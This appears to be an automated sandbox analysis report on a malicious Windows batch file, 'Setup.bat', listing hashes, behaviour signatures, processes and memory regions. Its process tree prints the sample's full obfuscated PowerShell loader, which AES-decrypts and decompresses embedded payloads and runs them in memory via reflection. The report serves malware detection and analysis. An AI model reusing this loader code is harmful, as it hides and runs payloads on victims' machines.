Analysis

  • max time kernel
    29s
  • max time network
    32s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    03/03/2023, 13:43

General

  • Target

    Setup.bat

  • Size

    851KB

  • MD5

    836da5f306323ef77ef9d202b27db8ed

  • SHA1

    ac9b73d0e25103d01d712351b272567242731870

  • SHA256

    b9c1108acaa4c76cc5ebab05af7a7a22815934495f436d1b24ce5ea4a1f52523

  • SHA512

    e6eddb5f1eb2e18aa329b3d6acb82d8fb314bfb8b498d03f8c4973eb8e0009c12f4006afbae9d4f2a961b89136ba36e6003f4d42e8a4c2fc97327969a5dc5bd5

  • SSDEEP

    24576:V5+Xu6sU5JOLdY425uawdKz+ZApMYtviru/LndyZDxO3B:M5Jk2PwdKz+bC+udyZVO3B

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Setup.bat"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1040
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -w hidden -c #
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1108
    • C:\Users\Admin\AppData\Local\Temp\Setup.bat.exe
      "C:\Users\Admin\AppData\Local\Temp\Setup.bat.exe" function cJ($p){$p.Replace('rKwQ', '')}$xTri=cJ 'ReadrKwQLinerKwQsrKwQ';$AnGh=cJ 'ChrKwQangrKwQeExrKwQtensrKwQionrKwQ';$beFr=cJ 'CrerKwQaterKwQDecrKwQryprKwQtorKwQrrKwQ';$zhbO=cJ 'FirrKwQstrKwQ';$kics=cJ 'ErKwQntrKwQryPrKwQoirKwQntrKwQ';$Sprr=cJ 'TrrKwQanrKwQsrKwQforKwQrmFrKwQinarKwQlBrKwQlorKwQckrKwQ';$bhNq=cJ 'GetrKwQCurKwQrrrKwQenrKwQtPrKwQrrKwQocesrKwQsrKwQ';$MtwQ=cJ 'LrKwQorKwQadrKwQ';$jLWF=cJ 'InrKwQvorKwQkerKwQ';$POzg=cJ 'FromrKwQBarKwQse6rKwQ4StrKwQrirKwQngrKwQ';function kRnlq($exGsi,$aqCVf,$JlGln){$vRtve=[System.Security.Cryptography.Aes]::Create();$vRtve.Mode=[System.Security.Cryptography.CipherMode]::CBC;$vRtve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$vRtve.Key=[System.Convert]::$POzg($aqCVf);$vRtve.IV=[System.Convert]::$POzg($JlGln);$KhygM=$vRtve.$beFr();$awxFP=$KhygM.$Sprr($exGsi,0,$exGsi.Length);$KhygM.Dispose();$vRtve.Dispose();$awxFP;}function GxEJe($exGsi){$CkRZq=New-Object System.IO.MemoryStream(,$exGsi);$PjiLu=New-Object System.IO.MemoryStream;$oGaVi=New-Object System.IO.Compression.GZipStream($CkRZq,[IO.Compression.CompressionMode]::Decompress);$oGaVi.CopyTo($PjiLu);$oGaVi.Dispose();$CkRZq.Dispose();$PjiLu.Dispose();$PjiLu.ToArray();}function gEeVK($exGsi,$aqCVf){[System.Reflection.Assembly]::$MtwQ([byte[]]$exGsi).$kics.$jLWF($null,$aqCVf);}$Rlhuk=[System.Linq.Enumerable]::$zhbO([System.IO.File]::$xTri([System.IO.Path]::$AnGh([System.Diagnostics.Process]::$bhNq().MainModule.FileName, $null)));$KvEFp = $Rlhuk.Substring(3).Split('\');$eIviz=GxEJe (kRnlq ([Convert]::$POzg($KvEFp[0])) $KvEFp[2] $KvEFp[3]);$UosgH=GxEJe (kRnlq ([Convert]::$POzg($KvEFp[1])) $KvEFp[2] $KvEFp[3]);gEeVK $UosgH $null;gEeVK $eIviz $null;
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1068

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Setup.bat.exe

    Filesize

    462KB

    MD5

    852d67a27e454bd389fa7f02a8cbe23f

    SHA1

    5330fedad485e0e4c23b2abe1075a1f984fde9fc

    SHA256

    a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

    SHA512

    327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

  • \Users\Admin\AppData\Local\Temp\Setup.bat.exe

    Filesize

    462KB

    MD5

    852d67a27e454bd389fa7f02a8cbe23f

    SHA1

    5330fedad485e0e4c23b2abe1075a1f984fde9fc

    SHA256

    a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

    SHA512

    327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

  • memory/1068-71-0x0000000002750000-0x00000000027D0000-memory.dmp

    Filesize

    512KB

  • memory/1068-69-0x000000001B0D0000-0x000000001B3B2000-memory.dmp

    Filesize

    2.9MB

  • memory/1068-70-0x00000000002D0000-0x00000000002D8000-memory.dmp

    Filesize

    32KB

  • memory/1068-72-0x0000000002750000-0x00000000027D0000-memory.dmp

    Filesize

    512KB

  • memory/1068-73-0x0000000002750000-0x00000000027D0000-memory.dmp

    Filesize

    512KB

  • memory/1068-74-0x000000000275B000-0x0000000002792000-memory.dmp

    Filesize

    220KB

  • memory/1108-61-0x0000000002570000-0x0000000002578000-memory.dmp

    Filesize

    32KB

  • memory/1108-62-0x00000000027AB000-0x00000000027E2000-memory.dmp

    Filesize

    220KB

  • memory/1108-60-0x00000000027A0000-0x0000000002820000-memory.dmp

    Filesize

    512KB

  • memory/1108-59-0x00000000027A0000-0x0000000002820000-memory.dmp

    Filesize

    512KB

  • memory/1108-58-0x000000001B150000-0x000000001B432000-memory.dmp

    Filesize

    2.9MB